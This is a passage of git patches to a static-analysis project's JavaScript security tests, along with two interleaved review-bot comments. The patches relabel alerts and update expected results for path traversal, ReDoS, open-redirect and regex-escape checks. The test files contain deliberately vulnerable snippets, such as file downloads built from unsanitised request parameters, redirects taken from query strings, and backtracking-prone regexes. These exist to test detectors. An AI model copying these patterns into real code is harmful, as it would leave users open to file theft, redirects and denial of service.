x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... 
\\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. 
| +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index f776c9d40e68..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); From 87518ba60e237266d8b6aa2334a58d44778c6e48 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 26 Feb 2025 13:09:21 +0100 Subject: [PATCH 090/115] JS: Update tainted-sendFile.js This file was added on main while this branch was in progress. Porting the whole file in one step. --- .../CWE-022/TaintedPath/TaintedPath.expected | 24 +++++++++---------- .../CWE-022/TaintedPath/tainted-sendFile.js | 13 ++++------ 2 files changed, 17 insertions(+), 20 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 14fcafa92069..338cd21265d3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected 
@@ -161,10 +161,10 @@ | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. 
| tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | 
@@ -571,8 +571,8 @@ edges | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | 
@@ -1080,12 +1080,12 @@ nodes | tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | | tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index 9a200f2a4c99..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -23,17 +23,14 @@ app.get('/some/path/:x', function(req, res) { res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); From b4ac2f7d73eb6bc330d13230b7fffd99b71812f9 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:07 +0100 Subject: [PATCH 091/115] JS: Add a query ID --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index b71ed168533f..4a92f5f29fb4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } From fd6a9c614408c897261b96be25896cef6f513b4a Mon Sep 17 00:00:00 2001 
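Review bot: The rationale for the flagged `res.download` calls is dropped together with the old `BAD:` comments, leaving bare `$ Alert` tags on lines that look much like the `OK` call below them; the tag can carry the reason, e.g. `res.download(homeDir + '/data/' + req.params.x); // $ Alert - '../' in req.params.x escapes data/` and `res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - root itself is user-controlled`, which also matches the .expected output where only `req.param("dir")` is reported on the last of these. The unchanged context line `res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/'` understates the risk: `path.join` normalises `..`, so a `../../` prefix in `req.params.x` climbs out of `data/` and, if `homeDir` ends in a separator, out of `homeDir` as well. If leaving that call unflagged is intentional, the comment should say it is a known false negative rather than "kinda OK". The enclosing `app.get('/some/path/:x', ...)` callback starts outside the hunk.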
From: Asger F Date: Wed, 26 Feb 2025 13:21:20 +0100 Subject: [PATCH 092/115] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c5b183cb273d..d5a28e5858dc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -342,4 +342,4 @@ var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] -var unicodeSets = /(aa?)*b/v; +var unicodeSets = /(aa?)*b/v; // $ Alert[js/redos] From 19cada38ffc765705fcd9720afca34565b6c9735 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:40 +0100 Subject: [PATCH 093/115] JS: Migrate a new file from OK-style comments --- .../Security/CWE-601/ClientSideUrlRedirect/tst16.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js index 49c88a892c9e..edeaa40174d4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js 
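Review bot: The newly accepted `v`-flag case `/(aa?)*b/v` exercises nothing specific to unicode-sets mode: the pattern body is plain ES5 syntax, so the test only shows that the flag does not suppress the alert, not that the regex parser copes with `v`-only constructs such as set subtraction or nested classes. A companion case using such syntax would pin that down, e.g. `var unicodeSets2 = /([\w--[0-9]]+)+b/v; // $ Alert[js/redos]`, assuming the analysis treats the subtracted class like an ordinary character class; if it does not, the line should carry `$ MISSING: Alert[js/redos]` so the gap is recorded rather than silently ignored.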
@@ -2,7 +2,7 @@ import queryString from 'query-string';
 import querystringify from 'querystringify';
 function foo() {
- location.href = queryString.parse(location.search).data; // NOT OK
- location.href = queryString.extract(location.search); // NOT OK
- location.href = querystringify.parse(location.search).data; // NOT OK
+ location.href = queryString.parse(location.search).data; // $ Alert
+ location.href = queryString.extract(location.search); // $ Alert
+ location.href = querystringify.parse(location.search).data; // $ Alert
 }
From 64d39da5f81be4600aa207c997ed0643a711a631 Mon Sep 17 00:00:00 2001
From: Asger F Date: Wed, 26 Feb 2025 13:57:10 +0100 Subject: [PATCH 094/115] JS: Accept Sources/Sink tags --- .../tst-UntrustedDataToExternalAPI.js | 2 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 2 +- .../CWE-022/TaintedPath/TaintedPath.js | 18 +- .../TaintedPath/examples/TaintedPath.js | 2 +- .../CWE-022/TaintedPath/normalizedPaths.js | 46 ++-- .../CWE-022/TaintedPath/other-fs-libraries.js | 10 +- .../Security/CWE-022/TaintedPath/prettier.js | 2 +- .../Security/CWE-022/TaintedPath/pupeteer.js | 2 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 6 +- .../TaintedPath/tainted-promise-steps.js | 2 +- .../TaintedPath/tainted-string-steps.js | 2 +- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 10 +- .../Security/CWE-022/ZipSlip/ZipSlipBad2.js | 2 +- .../CWE-022/ZipSlip/ZipSlipBadUnzipper.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 4 +- .../test/query-tests/Security/CWE-073/tst2.js | 10 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 18 +- .../CWE-078/CommandInjection/exec-sh.js | 4 +- .../CWE-078/CommandInjection/exec-sh2.js | 4 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 12 +- .../CWE-078/CommandInjection/other.js | 2 +- .../third-party-command-injection.js | 2 +- .../IndirectCommandInjection/actions.js | 2 +- ...ommand-line-parameter-command-injection.js | 32 +-- .../second-order.js | 4 +- .../lib/isImported.js | 4 +- .../UnsafeShellCommandConstruction/lib/lib.js | 246 +++++++++--------- .../lib/lib2.js | 8 +- .../lib/subLib/amdSub.js | 4 +- .../lib/subLib/index.js | 10 +- .../lib/subLib2/compiled-file.ts | 4 +- .../lib/subLib2/special-file.js | 4 +- .../lib/subLib3/my-file.ts | 4 +- .../lib/subLib4/index.js | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-079/DomBasedXss/addEventListener.js | 6 +- 
.../DomBasedXss/angular-tempate-url.js | 2 +- .../CWE-079/DomBasedXss/classnames.js | 2 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 8 +- .../Security/CWE-079/DomBasedXss/d3.js | 2 +- .../Security/CWE-079/DomBasedXss/dates.js | 8 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 6 +- .../Security/CWE-079/DomBasedXss/jquery.js | 4 +- .../CWE-079/DomBasedXss/json-stringify.jsx | 2 +- .../CWE-079/DomBasedXss/jwt-server.js | 2 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 4 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 2 +- .../CWE-079/DomBasedXss/react-use-state.js | 8 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 2 +- .../CWE-079/DomBasedXss/stored-xss.js | 4 +- .../tainted-url-suffix-arguments.js | 2 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 4 +- .../Security/CWE-079/DomBasedXss/translate.js | 2 +- .../CWE-079/DomBasedXss/trusted-types.js | 4 +- .../Security/CWE-079/DomBasedXss/tst.js | 62 ++--- .../Security/CWE-079/DomBasedXss/tst3.js | 2 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 2 +- .../Security/CWE-079/DomBasedXss/winjs.js | 2 +- .../CWE-079/ExceptionXss/exception-xss.js | 12 +- .../CWE-079/ReflectedXss/ReflectedXss.js | 8 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 2 +- .../Security/CWE-079/ReflectedXss/etherpad.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 2 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 8 +- .../Security/CWE-079/ReflectedXss/promises.js | 2 +- .../Security/CWE-079/ReflectedXss/tst2.js | 14 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 4 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 2 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 4 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- 
.../CWE-079/UnsafeHtmlConstruction/main.js | 20 +- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 4 +- .../unsafe-jquery-plugin.js | 30 +-- .../Security/CWE-079/XssThroughDom/angular.ts | 2 +- .../Security/CWE-079/XssThroughDom/forms.js | 16 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 12 +- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 4 +- .../Security/CWE-089/untyped/graphql.js | 12 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 4 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 2 +- .../CWE-089/untyped/marsdb-flow-to.js | 2 +- .../Security/CWE-089/untyped/marsdb.js | 2 +- .../Security/CWE-089/untyped/minimongo.js | 2 +- .../Security/CWE-089/untyped/mongodb.js | 12 +- .../CWE-089/untyped/mongodb_bodySafe.js | 2 +- .../Security/CWE-089/untyped/mongoose.js | 4 +- .../CWE-089/untyped/mongooseJsonParse.js | 2 +- .../CWE-089/untyped/mongooseModelClient.js | 2 +- .../Security/CWE-089/untyped/mysql.js | 2 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 2 +- .../Security/CWE-089/untyped/redis.js | 4 +- .../Security/CWE-089/untyped/socketio.js | 2 +- .../Security/CWE-089/untyped/tst3.js | 2 +- .../CodeInjection/bad-code-sanitization.js | 4 +- .../Security/CWE-094/CodeInjection/express.js | 6 +- .../CWE-094/CodeInjection/lib/index.js | 8 +- .../CWE-094/CodeInjection/react-native.js | 2 +- .../CWE-094/CodeInjection/template-sinks.js | 2 +- .../Security/CWE-094/CodeInjection/tst.js | 2 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 2 +- .../CWE-116/IncompleteSanitization/tst.js | 2 +- .../Security/CWE-117/logInjectionBad.js | 12 +- .../Security/CWE-200/FileAccessToHttp.js | 2 +- .../Security/CWE-200/bufferRead.js | 2 +- .../Security/CWE-200/googlecompiler.js | 2 +- .../Security/CWE-200/readFileSync.js | 2 +- 
.../Security/CWE-200/readStreamRead.js | 2 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 2 +- .../Security/CWE-201/PostMessageStar2.js | 2 +- .../test/query-tests/Security/CWE-209/node.js | 2 +- .../test/query-tests/Security/CWE-209/tst.js | 2 +- .../Security/CWE-312/CleartextStorage.js | 2 +- .../Security/CWE-312/CleartextStorage2.js | 2 +- .../Security/CWE-312/build-leaks.js | 6 +- .../query-tests/Security/CWE-312/passwords.js | 22 +- .../Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-327/tst.js | 2 +- .../test/query-tests/Security/CWE-338/tst.js | 8 +- .../test/query-tests/Security/CWE-346/tst.js | 2 +- .../CWE-377/insecure-temporary-file.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 4 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 4 +- .../Security/CWE-400/ReDoS/lib/lib.js | 22 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 4 +- .../ReDoS/lib/otherLib/js/src/index.js | 4 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 12 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 4 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 4 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 4 +- .../CWE-400/ReDoS/polynomial-redos.js | 148 +++++------ .../CWE-400/RemovePropertyInjection/tst.js | 2 +- .../RemovePropertyInjection/tstNonExpr.js | 2 +- .../test/query-tests/Security/CWE-506/tst.js | 4 +- .../CWE-522-DecompressionBombs/adm-zip.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 2 +- .../CWE-522-DecompressionBombs/pako.js | 4 +- .../CWE-522-DecompressionBombs/unzipper.js | 2 +- .../CWE-522-DecompressionBombs/yauzl.js | 2 +- .../CWE-522-DecompressionBombs/zlib.js | 8 +- .../CWE-601/ClientSideUrlRedirect/electron.js | 2 +- .../ClientSideUrlRedirect/regexp-exec.js | 10 +- 
